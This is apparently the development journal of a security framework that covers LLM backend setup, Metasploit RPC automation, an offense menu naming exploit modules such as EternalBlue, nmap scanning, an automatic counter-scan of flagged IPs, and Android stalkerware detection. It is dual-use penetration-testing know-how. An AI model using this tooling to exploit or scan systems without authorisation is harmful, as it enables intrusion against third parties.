+- **OSINT Sources**: maigret, snoop, sherlock, blackbird, reveal-my-name, whatsmyname, detectdee, nexfil, cupidcr4wl, custom + +--- + +## Session 7 - 2026-01-28: SafeTensors Model Support + +### Overview + +Added support for HuggingFace SafeTensors models alongside existing GGUF models. AUTARCH now supports three LLM backends: +1. **llama.cpp** - GGUF models (CPU-optimized, single file) +2. **transformers** - SafeTensors models (GPU-optimized, HuggingFace format) +3. **Claude API** - Anthropic's cloud API + +### New Files + +None - all changes were modifications to existing files. + +### Modified Files + +#### core/config.py +- Added `[transformers]` section to DEFAULT_CONFIG with settings: + - `model_path`, `device`, `torch_dtype` + - `load_in_8bit`, `load_in_4bit` (quantization options) + - `trust_remote_code` + - `max_tokens`, `temperature`, `top_p`, `top_k`, `repetition_penalty` +- Added `get_transformers_settings()` method + +#### core/llm.py +- Added `TransformersLLM` class implementing same interface as `LLM`: + - Uses HuggingFace `AutoModelForCausalLM` and `AutoTokenizer` + - Supports automatic device detection (cuda/mps/cpu) + - Supports 8-bit and 4-bit quantization via bitsandbytes + - Supports streaming via `TextIteratorStreamer` + - Uses tokenizer's `apply_chat_template` when available, falls back to ChatML + - `_is_valid_model_dir()` validates SafeTensors directories +- Added `detect_model_type()` function to auto-detect model format: + - Returns 'gguf' for GGUF files + - Returns 'transformers' for SafeTensors directories + - Returns 'unknown' for unrecognized formats +- Updated `get_llm()` to support 'transformers' backend + +#### modules/setup.py +- Updated docstring to reflect multi-format support +- Rewrote `validate_model_path()` to return `(is_valid, model_type)` tuple +- Updated model path prompt to explain both formats +- Auto-detects model type and sets appropriate backend +- Added backend-specific configuration: + - GGUF: Context size, threads, GPU layers + - SafeTensors: Device selection, quantization options +- Updated summary display to show backend-specific settings + +#### core/menu.py +- Updated `get_status_line()` to show model backend type +- Updated `show_llm_settings()` to display backend-specific settings +- Updated `_set_llm_model_path()` to auto-detect and switch backends +- Updated `_load_llm_model()` to handle both backends +- Added `_set_transformers_device()` for device configuration +- Added `_set_transformers_quantization()` for 8-bit/4-bit options +- Added `_switch_llm_backend()` to manually switch backends +- Updated `_set_llm_temperature()`, `_set_llm_sampling()`, `_set_llm_repeat_penalty()`, `_set_llm_max_tokens()` to work with both backends + +### Configuration Format + +New `autarch_settings.conf` section: +```ini +[transformers] +model_path = /path/to/model/directory +device = auto +torch_dtype = auto +load_in_8bit = false +load_in_4bit = false +trust_remote_code = false +max_tokens = 2048 +temperature = 0.7 +top_p = 0.9 +top_k = 40 +repetition_penalty = 1.1 +``` + +### Usage + +**Setup Wizard:** +``` +Model path: /home/user/models/Lily-Cybersecurity-7B +SafeTensors model found: Lily-Cybersecurity-7B + +Device Configuration (transformers) +Device [auto]: cuda +Quantization option [1]: 3 # 4-bit +``` + +**Settings Menu:** +- LLM Settings now shows backend-specific options +- [S] Switch Backend option to change between llama.cpp/transformers/Claude + +### Dependencies + +For SafeTensors support, users need: +```bash +pip install transformers torch +# Optional for quantization: +pip install bitsandbytes accelerate +``` + +### Notes + +- Model type is auto-detected when path is provided +- Backend switches automatically when model path changes +- Quantization requires bitsandbytes package +- Device 'auto' uses CUDA if available, then MPS, then CPU +- SafeTensors models should be complete HuggingFace model directories with config.json + +--- + +## Session 7b - 2026-01-28: Hardware Configuration Templates + +### Overview + +Added hardware-specific configuration templates and custom config save/load functionality to make LLM setup easier for different hardware configurations. + +### New Files + +#### .config/nvidia_4070_mobile.conf +Hardware template for NVIDIA GeForce RTX 4070 Mobile (8GB VRAM) +- n_gpu_layers = -1 (full GPU offload) +- n_ctx = 8192 +- float16 dtype +- Suitable for 7B-13B models + +#### .config/amd_rx6700xt.conf +Hardware template for AMD Radeon RX 6700 XT (12GB VRAM) +- Requires ROCm drivers and PyTorch ROCm build +- llama.cpp requires HIP/CLBlast build +- n_ctx = 8192 +- Suitable for 7B-13B models at float16 + +#### .config/orangepi5plus_cpu.conf +Hardware template for Orange Pi 5 Plus (RK3588 SoC, CPU-only) +- n_threads = 4 (uses fast A76 cores only) +- n_gpu_layers = 0 +- n_ctx = 2048 (conservative for RAM) +- Best with Q4_K_M quantized GGUF models + +#### .config/orangepi5plus_mali.conf +**EXPERIMENTAL** template for Orange Pi 5 Plus with Mali-G610 GPU +- Attempts OpenCL acceleration via CLBlast +- n_gpu_layers = 8 (partial offload) +- Instructions for building llama.cpp with CLBlast +- May provide 20-30% speedup, but unstable + +### Modified Files + +#### core/config.py +- Added `get_templates_dir()` - returns `.config` directory path +- Added `get_custom_configs_dir()` - returns `.config/custom` directory path +- Added `list_hardware_templates()` - lists available hardware templates +- Added `list_custom_configs()` - lists user-saved custom configs +- Added `load_template(template_id)` - loads a hardware template +- Added `load_custom_config(filepath)` - loads a custom config file +- Added `_load_llm_settings_from_file()` - internal method to load llama/transformers sections +- Added `save_custom_config(name)` - saves current LLM settings to custom config +- Added `delete_custom_config(filepath)` - deletes a custom config file + +#### core/menu.py +- Added `[T] Load Hardware Template` option in LLM Settings +- Added `[C] Load Custom Config` option in LLM Settings +- Added `[W] Save Current as Custom Config` option in LLM Settings +- Added `_load_hardware_template()` - UI for selecting hardware templates +- Added `_load_custom_config()` - UI for loading custom configs +- Added `_delete_custom_config()` - UI for deleting custom configs +- Added `_save_custom_config()` - UI for saving current settings + +### Directory Structure + +``` +.config/ +├── nvidia_4070_mobile.conf # NVIDIA RTX 4070 Mobile template +├── amd_rx6700xt.conf # AMD RX 6700 XT template +├── orangepi5plus_cpu.conf # Orange Pi 5 Plus CPU template +├── orangepi5plus_mali.conf # Orange Pi 5 Plus Mali (experimental) +└── custom/ # User-saved custom configurations + └── *.conf # Custom config files +``` + +### Usage + +**Loading a Hardware Template:** +``` +LLM Settings > [T] Load Hardware Template + +Hardware Configuration Templates +Select a template optimized for your hardware + +[1] NVIDIA RTX 4070 Mobile + 8GB VRAM, CUDA, optimal for 7B-13B models +[2] AMD Radeon RX 6700 XT + 12GB VRAM, ROCm, optimal for 7B-13B models +[3] Orange Pi 5 Plus (CPU) + RK3588 ARM64, CPU-only, for quantized models +[4] Orange Pi 5 Plus (Mali GPU) + EXPERIMENTAL - Mali-G610 OpenCL acceleration + +Select template: 1 +[+] Loaded template: NVIDIA RTX 4070 Mobile + Note: Model path preserved from current config +``` + +**Saving Custom Configuration:** +``` +LLM Settings > [W] Save Current as Custom Config + +Save Custom Configuration +Save your current LLM settings for later use + +Configuration name: My Gaming PC Settings +[+] Saved to: my_gaming_pc_settings.conf + Full path: /home/snake/dh_framework/.config/custom/my_gaming_pc_settings.conf +``` + +**Loading Custom Configuration:** +``` +LLM Settings > [C] Load Custom Config + +Custom Configurations + +[1] My Gaming Pc Settings + my_gaming_pc_settings.conf + +[D] Delete a custom config +[0] Cancel + +Select config: 1 +[+] Loaded config: My Gaming Pc Settings +``` + +### Template Details + +| Template | GPU Layers | Context | Threads | Quantization | Target | +|----------|-----------|---------|---------|--------------|--------| +| NVIDIA 4070 Mobile | -1 (all) | 8192 | 8 | None/4-bit | 7B-13B | +| AMD RX 6700 XT | -1 (all) | 8192 | 8 | None/4-bit | 7B-13B | +| Orange Pi CPU | 0 | 2048 | 4 | Q4_K_M recommended | 7B Q4 | +| Orange Pi Mali | 8 | 2048 | 4 | 4-bit | 7B Q4 | + +### Notes + +- Templates preserve the current model path when loaded +- Custom configs are stored in `.config/custom/` directory +- Experimental templates show a warning before loading +- The Orange Pi Mali template requires additional setup (CLBlast, OpenCL drivers) +- AMD GPU support requires ROCm drivers and specially compiled PyTorch/llama.cpp + +### Testing Notes + +**Setup Wizard Test Run:** +- Successfully displays banner and welcome message +- Model format options (GGUF/SafeTensors) clearly explained +- Shows current configured model path as default +- Auto-detection of model type works when path is accessible + +**Known Issue Found:** +- `PermissionError` when model path points to external drive that's not mounted or inaccessible +- The `validate_model_path()` function should handle permission errors gracefully +- Current behavior: crashes with traceback +- Suggested fix: wrap `path.exists()` in try/except for PermissionError + +**Bug Location:** `modules/setup.py:119` - `validate_model_path()` method - **FIXED** + +```python +# Fix applied - now handles permission errors gracefully: +try: + if not path.exists(): + return False, None +except (PermissionError, OSError): + return False, None +``` + +### Files Modified This Session + +| File | Changes | +|------|---------| +| `core/config.py` | Added transformers section, template/custom config methods | +| `core/llm.py` | Added TransformersLLM class, detect_model_type() | +| `core/menu.py` | Updated LLM settings UI, added template/config options | +| `modules/setup.py` | Added SafeTensors support, auto-detection | +| `.config/*.conf` | Created 4 hardware templates | +| `devjournal.md` | Documented all changes | + +### Additional Fixes Applied + +**Path Resolution Enhancement:** +Added `resolve_model_path()` method to both `setup.py` and `menu.py` to handle various path formats: +- `/dh_framework/models/...` - common user mistake (missing /home/user) +- `models/ModelName` - relative to framework directory +- `ModelName` - just the model name (looks in models/ subdir) +- Full absolute paths + +This makes model path entry more forgiving and user-friendly. + +**Files Updated:** +- `modules/setup.py` - Added `resolve_model_path()` method +- `core/menu.py` - Added `_resolve_model_path()` method + +### Git-LFS Model Files Note + +The Lily-Cybersecurity-7B-v0.2 model in `models/` contains git-lfs pointer files, not actual model weights. Each `.safetensors` file is 135 bytes (pointer) instead of ~5GB (actual weights). + +**Error when loading:** +``` +Error while deserializing header: header too large +``` + +**Solution:** +```bash +cd models/Lily-Cybersecurity-7B-v0.2 +git lfs pull +``` + +This will download the actual model files (~27GB total). + +### Deprecation Warning + +``` +`torch_dtype` is deprecated! Use `dtype` instead! +``` + +This is a minor warning from newer transformers versions. The code still works correctly. + +### HuggingFace Model ID Support + +Added support for loading models by HuggingFace ID (e.g., `segolilylabs/Lily-Cybersecurity-7B-v0.2`) which loads from the HuggingFace cache (`~/.cache/huggingface/hub/`). + +**Files Updated:** +- `core/llm.py` - TransformersLLM.load_model() now accepts HuggingFace model IDs +- `core/menu.py` - Added `_is_huggingface_id()` method, updated model path setting +- `modules/setup.py` - Added `_is_huggingface_id()` method, updated setup wizard + +**Usage:** +``` +Model path: segolilylabs/Lily-Cybersecurity-7B-v0.2 +[+] HuggingFace model ID set: segolilylabs/Lily-Cybersecurity-7B-v0.2 + Model will be loaded from HuggingFace cache +``` + +### GGUF Tokenizer/Config Auto-Detection + +Added automatic detection of tokenizer and config files when loading GGUF models. The loader now: +1. Searches for metadata files in the GGUF directory: + - `tokenizer.json` - Full tokenizer definition + - `tokenizer_config.json` - Tokenizer configuration and chat template + - `special_tokens_map.json` - BOS, EOS, PAD, UNK token mappings + - `config.json` - Model architecture config +2. If not found and GGUF is in a subdirectory like `guff/` or `gguf/`, checks parent directory +3. Detects chat format from tokenizer_config.json (chatml, llama-2, mistral-instruct, etc.) +4. Loads special tokens (bos_token, eos_token, pad_token, unk_token) for proper formatting +5. Passes detected chat_format to llama-cpp-python + +**Files Updated:** +- `core/llm.py` - Added `_detect_chat_format()` method to LLM class +- LLM class now stores `_special_tokens`, `_chat_format`, `_metadata_dir` + +**Supported Chat Formats:** +- `chatml` - ChatML format (Qwen, etc.) +- `llama-2` - Llama 2 format with [INST] tags +- `mistral-instruct` - Mistral instruction format +- `vicuna` - Vicuna format +- `alpaca` - Alpaca format +- `zephyr` - Zephyr format + +**Special Tokens Loaded:** +- `bos_token` - Beginning of sequence (e.g., ``) +- `eos_token` - End of sequence (e.g., ``) +- `pad_token` - Padding token +- `unk_token` - Unknown token (e.g., ``) + +**Example Output:** +``` +[*] Loading model: model.Q4_K_M.gguf + Context: 4096 | Threads: 4 | GPU Layers: 0 + Found model metadata in: Lily-Cybersecurity-7B-v0.2/ + Files: tokenizer.json, tokenizer_config.json, special_tokens_map.json, config.json + Special tokens: bos_token=, eos_token=, pad_token=, unk_token= + Chat format: llama-2 +[+] Model loaded successfully +``` + +### Next Steps + +1. ~~Fix PermissionError handling in `validate_model_path()`~~ DONE +2. ~~Fix path resolution for relative/partial paths~~ DONE +3. ~~Add HuggingFace model ID support~~ DONE +4. ~~Add GGUF tokenizer/config auto-detection~~ DONE +5. Test hardware template loading via Settings menu +6. Test custom config save/load functionality +7. Download actual model files via `git lfs pull` +8. Verify SafeTensors model loading with actual model files +9. Test on Orange Pi 5 Plus hardware + +--- + +## Session 8 - 2026-01-29: Metasploit Auto-Connect + +### Overview + +Added automatic Metasploit RPC server management on application startup. When AUTARCH starts, it now handles msfrpcd server lifecycle automatically. + +### New Features + +#### MSF Auto-Connect Flow + +On startup, AUTARCH will: +1. **Scan** for existing msfrpcd server (socket + process detection) +2. **If found**: Kill the existing server, prompt for new credentials +3. **If not found**: Prompt for username/password +4. **Start** msfrpcd with the provided credentials +5. **Connect** to the new server + +#### Command Line Options + +```bash +# Skip autoconnect entirely +python autarch.py --no-msf + +# Quick connect with credentials (non-interactive) +python autarch.py --msf-user msf --msf-pass secret +``` + +### Modified Files + +#### core/msf.py + +Added new imports: `socket`, `subprocess`, `time`, `os`, `signal` + +**New MSFManager methods:** +- `detect_server() -> Tuple[bool, Optional[str]]` - Detect running msfrpcd via socket probe and process scan +- `_find_msfrpcd_pid() -> Optional[str]` - Find PID using pgrep or /proc scan +- `kill_server() -> bool` - Gracefully terminate msfrpcd (SIGTERM, then SIGKILL) +- `start_server(username, password, host, port, use_ssl) -> bool` - Launch msfrpcd and wait for port availability +- `autoconnect() -> bool` - Full interactive autoconnect flow with prompts +- `set_autoconnect(enabled: bool)` - Toggle autoconnect in config + +**Updated methods:** +- `get_settings()` - Now includes `autoconnect` setting + +**New standalone functions:** +- `msf_startup_autoconnect(skip_if_disabled)` - Entry point for startup autoconnect +- `msf_quick_connect(username, password, ...)` - Non-interactive server setup + +#### autarch.py + +**New command line arguments:** +- `--no-msf` - Skip Metasploit autoconnect on startup +- `--msf-user USER` - MSF RPC username for quick connect +- `--msf-pass PASS` - MSF RPC password for quick connect + +**New function:** +- `msf_autoconnect(skip, username, password)` - Wrapper for MSF startup + +**Modified:** +- `main()` - Now calls `msf_autoconnect()` after first-run check + +**Updated epilog** with MSF autoconnect documentation. + +#### core/menu.py + +**Updated `show_msf_settings()`:** +- Shows server status (Running/Not Running with PID) +- Shows client connection status separately +- Shows autoconnect setting status +- New menu options: + - `[4] Start Server` - Manually start msfrpcd + - `[5] Stop Server` - Manually stop msfrpcd + - `[6] Toggle Autoconnect` - Enable/disable autoconnect on startup + +### Configuration + +New setting in `autarch_settings.conf`: +```ini +[msf] +autoconnect = true +``` + +### Usage Examples + +**Interactive startup (default):** +``` +[*] Metasploit Auto-Connect + ────────────────────────────────────────── + + Scanning for existing MSF RPC server... + No existing server detected + + Configure MSF RPC Credentials + These credentials will be used for the new server + + Username [msf]: + Password (required): secret + Host [127.0.0.1]: + Port [55553]: + Use SSL (y/n) [y]: + + Starting msfrpcd server... + [+] Server started on 127.0.0.1:55553 + Connecting to server... + [+] Connected to Metasploit 6.x.x +``` + +**With existing server:** +``` + Scanning for existing MSF RPC server... + [!] Found existing msfrpcd server (PID: 12345) + Stopping existing server... + [+] Server stopped + + Configure MSF RPC Credentials + ... +``` + +**Quick connect (scripting):** +```bash +python autarch.py --msf-user msf --msf-pass mypassword +``` + +### Technical Notes + +- Server detection uses both socket probe (port check) and process scan (pgrep + /proc) +- Process termination uses SIGTERM first, falls back to SIGKILL after 1 second +- Server startup waits up to 30 seconds for port to become available +- SSL is enabled by default for msfrpcd connections +- Autoconnect can be disabled via settings menu or `--no-msf` flag + +### Dependencies + +- `msgpack` - Required for MSF RPC communication +- `msfrpcd` - Part of Metasploit Framework installation + +### Bug Fix: msgpack Bytes vs Strings + +**Issue:** Authentication was failing with "Authentication failed" even with correct credentials. + +**Root Cause:** The `msgpack.unpackb()` function returns byte keys/values (e.g., `b'result'`) but the code was comparing against string keys (`"result"`). + +**Fix:** Added normalization in `MetasploitRPC._request()` to decode byte keys/values to strings: +```python +result = msgpack.unpackb(response_data, raw=False, strict_map_key=False) +if isinstance(result, dict): + result = { + (k.decode() if isinstance(k, bytes) else k): (v.decode() if isinstance(v, bytes) else v) + for k, v in result.items() + } +``` + +**Also improved:** +- Increased RPC initialization wait time from 2s to 5s +- Increased auth verification retries from 5 to 10 +- Added helpful error message when auth fails suggesting to restart server + +--- + +## Session 9 - 2026-02-03: MSF Module Search Fix + +### Overview + +Fixed critical bug where Metasploit modules were not appearing in searches or the Offense menu. The issue was caused by incomplete bytes-to-string decoding in the MSF RPC response handling. + +### Root Cause + +The `msgpack.unpackb()` function returns data with bytes keys/values. The previous fix only decoded the top-level dict, but MSF module searches return a **list of dicts**, where each inner dict still had bytes keys (e.g., `b'fullname'`, `b'type'`). This caused `dict.get('fullname')` to return `None` because the actual key was `b'fullname'`. + +### Fixes Applied + +#### 1. core/msf.py - Recursive Bytes Decoding + +Added `_decode_bytes()` method that recursively decodes bytes throughout the entire response structure: + +```python +def _decode_bytes(self, obj): + if isinstance(obj, bytes): + return obj.decode('utf-8', errors='replace') + elif isinstance(obj, dict): + return {self._decode_bytes(k): self._decode_bytes(v) for k, v in obj.items()} + elif isinstance(obj, list): + return [self._decode_bytes(item) for item in obj] + elif isinstance(obj, tuple): + return tuple(self._decode_bytes(item) for item in obj) + else: + return obj +``` + +#### 2. core/msf.py - Fixed list_modules() API Method + +The `list_modules()` method was calling `module.list` which doesn't exist. Changed to use correct MSF RPC API methods: + +```python +type_to_method = { + "exploit": "module.exploits", + "auxiliary": "module.auxiliary", + "post": "module.post", + "payload": "module.payloads", + "encoder": "module.encoders", + "nop": "module.nops", +} +``` + +#### 3. modules/agent_hal.py - Use Centralized Interface + +Agent Hal was bypassing `msf_interface.py` and creating its own `MetasploitRPC` instance. Updated to use `get_msf_interface()` so all MSF operations go through the centralized interface: + +```python +def _ensure_msf_connected(self) -> bool: + if self.msf is None: + from core.msf_interface import get_msf_interface + self.msf = get_msf_interface() + connected, msg = self.msf.ensure_connected(auto_prompt=False) + ... +``` + +Also updated `_execute_msf_module()` and `quick_scan_target()` to use `run_module()` instead of the non-existent `execute_module()`. + +### Files Modified + +| File | Changes | +|------|---------| +| core/msf.py | Added `_decode_bytes()`, fixed `list_modules()` API calls | +| modules/agent_hal.py | Switched to `get_msf_interface()`, updated method calls | + +### Verification + +``` +=== MSF Interface Test === +Search (eternalblue): 5 results + - auxiliary/admin/smb/ms17_010_command + - auxiliary/scanner/smb/smb_ms17_010 + - exploit/windows/smb/ms17_010_eternalblue + - exploit/windows/smb/ms17_010_psexec + - exploit/windows/smb/smb_doublepulsar_rce + +List exploits: 2604 modules +Module info: SMB Version Detection ✓ +``` + +### Architecture Note + +All MSF operations now flow through `core/msf_interface.py`: +- `modules/msf.py` → uses `get_msf_interface()` +- `modules/agent_hal.py` → uses `get_msf_interface()` +- `modules/counter.py` → uses `get_msf_interface()` + +This ensures any future fixes apply everywhere automatically. + +--- + +## Session 10 - 2026-02-03: Offense Menu Overhaul + +### Overview + +Major overhaul of the MSF/Offense menu interface. Built foundation libraries for MSF option descriptions and module metadata, then completely rewrote the offense menu with improved UX. + +### Phase 1a: MSF Settings Term Bank + +Created `core/msf_terms.py` - centralized definitions for all MSF options. + +**Features:** +- 54 MSF settings with full descriptions, examples, and notes +- 14 categories: target, local, auth, payload, connection, scan, session, database, output, smb, http, ssh, execution, file +- Validation functions for settings (IP validation, port validation, etc.) +- Prompt generation with defaults and help text + +**API Functions:** +```python +from core.msf_terms import get_setting_info, get_setting_prompt, format_setting_help, validate_setting_value + +info = get_setting_info('RHOSTS') # Full setting metadata +prompt = get_setting_prompt('LPORT', default=4444) # Input prompt with default +help_text = format_setting_help('PAYLOAD') # Formatted help block +valid, msg = validate_setting_value('RHOSTS', '192.168.1.1') # Validation +``` + +**Sample Settings:** +- RHOSTS, RHOST, RPORT, LHOST, LPORT, TARGETURI +- SMBUser, SMBPass, SMBDomain, HttpUsername, HttpPassword +- PAYLOAD, ENCODER, SESSION, DATABASE, OUTPUT + +### Phase 1b: MSF Module Library + +Created `core/msf_modules.py` - descriptions and metadata for common MSF modules. + +**Features:** +- 45 modules documented: 25 scanners, 12 exploits, 4 post, 4 payloads +- Full metadata: name, description, author, CVE, platforms, arch, reliability +- Searchable by name, tags, type, platform +- Formatted help output for display + +**API Functions:** +```python +from core.msf_modules import get_module_info, search_modules, get_modules_by_type, format_module_help + +info = get_module_info('auxiliary/scanner/smb/smb_version') +results = search_modules('eternalblue') +scanners = get_modules_by_type('auxiliary') +help_text = format_module_help('exploit/windows/smb/ms17_010_eternalblue') +``` + +**Module Categories:** +- SMB scanners (smb_version, smb_enumshares, smb_ms17_010, etc.) +- SSH scanners (ssh_version, ssh_login) +- HTTP scanners (http_version, dir_scanner, etc.) +- FTP scanners and exploits +- Windows exploits (EternalBlue, BlueKeep, etc.) +- Post-exploitation modules +- Payload generators + +### Phase 2: Offense Menu Rewrite + +Completely rewrote `modules/msf.py` (v1.1 → v2.0) with new features: + +**1. Global Target Settings** +- Pre-configure RHOSTS, LHOST, LPORT before browsing modules +- Settings persist across module selections +- Auto-filled when selecting modules +- Domain-to-IP resolution with confirmation +- Auto-detect LHOST from network interface + +**2. Module Browser** +- Category-based navigation (Scanners, Exploits, Post, Payloads, Auxiliary) +- Pagination with 20 modules per page +- Two-column display for compact viewing +- Combines library modules + live MSF modules when connected + +**3. Enhanced Module Details** +- Rich descriptions from module library +- CVE information, author, reliability rating +- Usage notes and warnings +- Option to fetch live info from MSF + +**4. Streamlined Workflow** +``` +Set Target [1] → Browse/Search [2/3] → Select Module → Configure → Run +``` + +**5. Quick Scan Improvements** +- Shows current target from global settings +- Uses pre-configured target automatically + +### New Menu Structure + +``` +Metasploit Framework +────────────────────────────────── + Status: Connected + Target: 192.168.1.100 + LHOST: 192.168.1.50 + Module: auxiliary/scanner/smb/smb_version + + [1] Set Target - Configure target & listener settings + [2] Module Browser - Browse modules by category + [3] Search Modules - Search all modules + + [4] Current Module - View/configure selected module + [5] Run Module - Execute current module + + [6] Sessions - View and interact with sessions + [7] Jobs - View running background jobs + + [8] MSF Console - Direct console access + [9] Quick Scan - Common scanners + + [0] Back to Main Menu +``` + +### Target Configuration Screen + +``` +Target Configuration + Set target and listener options before selecting modules +────────────────────────────────── + + [1] RHOSTS = 192.168.1.100 + The target host(s) to scan or exploit. Can be a single IP... + + [2] LHOST = (not set) + Your IP address that the target will connect back to... + + [3] LPORT = 4444 + The port your machine listens on for incoming connections... + + [A] Auto-detect LHOST + [R] Resolve hostname to IP + + [0] Back +``` + +### Module Browser + +``` +Scanners + Page 1 of 2 (25 modules) +────────────────────────────────── + + [ 1] SMB Version Scanner [ 2] SMB Share Enumeration + [ 3] SMB User Enumeration [ 4] MS17-010 Vulnerability... + [ 5] TCP Port Scanner [ 6] SSH Version Scanner + ... + + [N] Next page [P] Previous [0] Back +``` + +### Files Created/Modified + +| File | Action | Description | +|------|--------|-------------| +| `core/msf_terms.py` | Created | MSF settings term bank (54 settings) | +| `core/msf_modules.py` | Created | MSF module library (45 modules) | +| `modules/msf.py` | Rewritten | Enhanced offense menu (v2.0) | + +### Integration Points + +The term bank and module library integrate with: +- `modules/msf.py` - Uses for help text and validation +- Future: `modules/agent_hal.py` - AI can reference descriptions +- Future: `core/pentest_pipeline.py` - Pipeline can use module metadata + +### Architecture Benefits + +1. **Centralized Knowledge** - Option descriptions and module info in one place +2. **Offline Documentation** - Help text available without MSF connection +3. **Consistent UX** - Same descriptions everywhere in the app +4. **Extensible** - Easy to add new settings and modules +5. **AI-Friendly** - Structured data for LLM context injection + +--- + +## Session 11 - 2026-02-14: Nmap Scanner & Scan Monitor + +Added two new tools: an Nmap scanner in the recon module and a real-time scan monitor in the defense module. + +### Nmap Scanner (Recon) + +- Menu entry `[X]` under Tools in OSINT menu +- Submenu with 9 scan types: Top 100, Quick, Full TCP, Stealth SYN, Service Detection, OS Detection, Vuln Scan, UDP, Custom +- Live-streaming output with color coding (green=open, dim=closed/filtered, cyan=scan headers) +- Open port summary after completion, optional save to file +- Tested on 127.0.0.1 - found 10 open ports in 0.05s + +### Scan Monitor (Defense) + +- Menu entry `[8]` in Defense module +- Uses `tcpdump` (with auto `sudo` elevation) to capture SYN-only packets in real-time +- Per-IP tracking with detection thresholds: + - Port scan: 10+ unique ports in 30s + - Brute force: 15+ connections to single port in 60s +- Counter-scan capability: auto-scans detected attacker IPs with nmap in daemon threads +- IP whitelisting and local IP auto-exclusion +- Logging to `results/scan_monitor.log` +- Stale entry pruning every 5s (120s TTL) +- Clean Ctrl+C shutdown with summary stats + +### Files Modified + +| File | Action | Description | +|------|--------|-------------| +| `modules/recon.py` | Modified | Added Nmap scanner (3 methods, menu entry, handler) | +| `modules/defender.py` | Modified | Added Scan Monitor (3 methods, 4 new imports, menu entry, handler) | + +--- + +## Session 14 - 2026-02-15: Android Protection Shield (Phase 4.6) + +### Overview + +Built a comprehensive anti-stalkerware and anti-spyware module for Android devices. Uses the existing ADB infrastructure (`core/hardware.py`) to scan connected Android devices for surveillance threats — from commercial stalkerware (mSpy, FlexiSpy, Cocospy, etc.) to government-grade spyware (Pegasus, Predator, Hermit, FinSpy). Provides detection, analysis, and remediation capabilities. + +### Architecture + +The module follows AUTARCH's standard pattern: core singleton manager + CLI module + Flask blueprint + web template. All ADB operations delegate to `HardwareManager._run_adb()` to reuse existing device connectivity. + +``` +core/android_protect.py # AndroidProtectManager singleton (~650 lines) +modules/android_protect.py # CLI menu, CATEGORY=defense (~450 lines) +web/routes/android_protect.py # Flask blueprint, 33 routes (~300 lines) +web/templates/android_protect.html # Web UI, 4 tabs (~500 lines) +data/stalkerware_signatures.json # Threat signature database +``` + +### Threat Signature Database + +`data/stalkerware_signatures.json` — JSON database with: +- **103 stalkerware families** with 275 package names (mSpy, FlexiSpy, Cocospy, XNSPY, Hoverwatch, KidsGuard Pro, Pegasus-adjacent RATs like SpyNote/DroidJack/AhMyth, APT spyware like VajraSpy/BadBazaar/GravityRAT, etc.) +- **10 government spyware families** with file, process, domain, and property indicators: + - Pegasus (NSO Group), Predator (Cytrox/Intellexa), Hermit (RCS Lab), FinSpy (FinFisher), QuaDream REIGN, Candiru, Chrysaor, Exodus (eSurv), Phantom (Paragon), Dark Caracal +- **8 dangerous permission combos** (full_surveillance, communication_intercept, accessibility_spy, keylogger_behavior, call_intercept, etc.) +- **12 suspicious system package names** (packages mimicking Android system apps) +- **9 legitimate accessibility apps** (whitelist for TalkBack, Samsung, Google accessibility) +- Updatable from GitHub (AssoEchap/stalkerware-indicators community feed) + +### Core Module: `core/android_protect.py` + +`AndroidProtectManager` singleton with: + +**Detection (11 scan types):** +- `scan_stalkerware()` — match installed packages against 275+ signatures +- `scan_hidden_apps()` — apps with no launcher icon (filtered from known system prefixes) +- `scan_device_admins()` — `dumpsys device_policy`, flag known-bad packages +- `scan_accessibility_services()` — enabled accessibility services, cross-ref whitelist +- `scan_notification_listeners()` — apps reading notifications, flag stalkerware +- `scan_usage_access()` — apps with usage stats permission +- `scan_spyware_indicators()` — government spyware file paths, processes, properties via ADB shell +- `scan_system_integrity()` — SELinux, verified boot, dm-verity, su binary, build fingerprint +- `scan_suspicious_processes()` — files in `/data/local/tmp/`, root processes from `/data/` +- `scan_certificates()` — user-installed CA certs in `/data/misc/user/0/cacerts-added/` +- `scan_network_config()` — HTTP proxy, DNS, private DNS, active VPN +- `scan_developer_options()` — USB debug, unknown sources, mock locations, OEM unlock + +**Permission Analysis:** +- `analyze_app_permissions()` — full granted/denied breakdown from `dumpsys package` +- `find_dangerous_apps()` — match all non-system apps against 8 dangerous permission combos +- `permission_heatmap()` — matrix of 12 dangerous permissions across all apps + +**Remediation:** +- `disable_threat()` — `pm disable-user` +- `uninstall_threat()` — `pm uninstall` (tries `--user 0` first, then without) +- `revoke_dangerous_perms()` — revokes 16 dangerous permissions +- `remove_device_admin()` — `dpm remove-active-admin` (auto-discovers component) +- `remove_ca_cert()` — removes user CA cert file +- `clear_proxy()` — clears HTTP proxy settings +- `disable_usb_debug()` — turns off ADB + +**Composite Scans:** +- `quick_scan()` — stalkerware + device admins + accessibility (fast) +- `full_protection_scan()` — all 11 scans + permission analysis, returns comprehensive report +- `export_scan_report()` — saves JSON to `data/android_protect//scans/` + +**Shizuku/Shield Management:** +- Shizuku: install, start, stop, status (for privileged ops on non-rooted devices) +- Shield app: install, configure (broadcast intent), grant permissions, status query + +### CLI Module: `modules/android_protect.py` + +CATEGORY = "defense". Interactive menu with 30+ options organized in sections: +- Quick Actions (quick scan, full scan, export) +- Detection (11 individual scans) +- Permission Analysis (dangerous apps, per-app analysis, heatmap) +- Remediation (disable, uninstall, revoke, remove admin, remove cert, clear proxy) +- Shizuku & Shield (status, install, start, configure, permissions) +- Database (stats, update) +- Device selector with auto-pick for single device + +### Web Blueprint: `web/routes/android_protect.py` + +Blueprint `android_protect_bp` at `/android-protect/` with 33 routes: +- `GET /` — render template with status and signature stats +- `POST /scan/{quick,full,export,stalkerware,hidden,admins,accessibility,listeners,spyware,integrity,processes,certs,network,devopt}` +- `POST /perms/{dangerous,analyze,heatmap}` +- `POST /fix/{disable,uninstall,revoke,remove-admin,remove-cert,clear-proxy}` +- `POST /shizuku/{status,install,start}` +- `POST /shield/{status,install,configure,permissions}` +- `POST /db/{stats,update}` +- File upload support for Shizuku/Shield APK install routes + +### Web Template: `web/templates/android_protect.html` + +4-tab interface (Scan | Permissions | Remediate | Shizuku): +- **Scan tab**: Quick/Full scan buttons, 11 individual scan buttons, color-coded severity results (critical=red, high=orange, medium=yellow, low=green), severity badges, structured output for each scan type +- **Permissions tab**: Find Dangerous Apps, per-app analyzer (package name input), permission heatmap table with colored cells +- **Remediate tab**: Package input + disable/uninstall/revoke/remove-admin buttons, proxy clearing, CA cert list with per-cert remove buttons +- **Shizuku tab**: Shizuku status cards (installed/running/version), install APK (file upload), start service, Shield app status/install/permissions, signature DB stats and update + +Device selector dropdown at top with refresh button, auto-populated from `/hardware/adb/devices`. + +### Integration + +- `web/app.py` — import + register `android_protect_bp` 